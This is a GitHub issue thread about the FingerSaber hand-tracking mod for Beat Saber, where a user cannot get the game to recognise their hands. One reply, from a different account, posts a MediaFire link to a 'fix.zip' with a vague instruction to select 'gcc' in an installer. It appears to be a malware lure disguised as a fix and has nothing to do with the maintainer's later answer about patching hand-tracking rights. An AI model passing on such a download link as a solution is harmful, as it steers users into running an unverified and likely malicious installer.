### ISSUE TITLE
I can't get it to work

### ISSUE THREAD

**Issue by madding1602** [im-henri/FingerSaber#15]
Hello everyone. I've installed the mod recently. However, I can't get it to work. I have hand tracking enabled, but as soon as I try to start the game it asks me to use controllers. Once inside, I can't get the game to recognize my hands and the sabers are left on the last position of the controllers. Am I doing something wrong? I'm on 1.37

**Comment by esttemanb** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by im-henri** [comment]
You need to patch the game with hand-tracking rights. This is not the same as enabling hand-tracking in quest! Read the mod description in discord BSMG channel for more info or contact me on discord @ "drumtool"
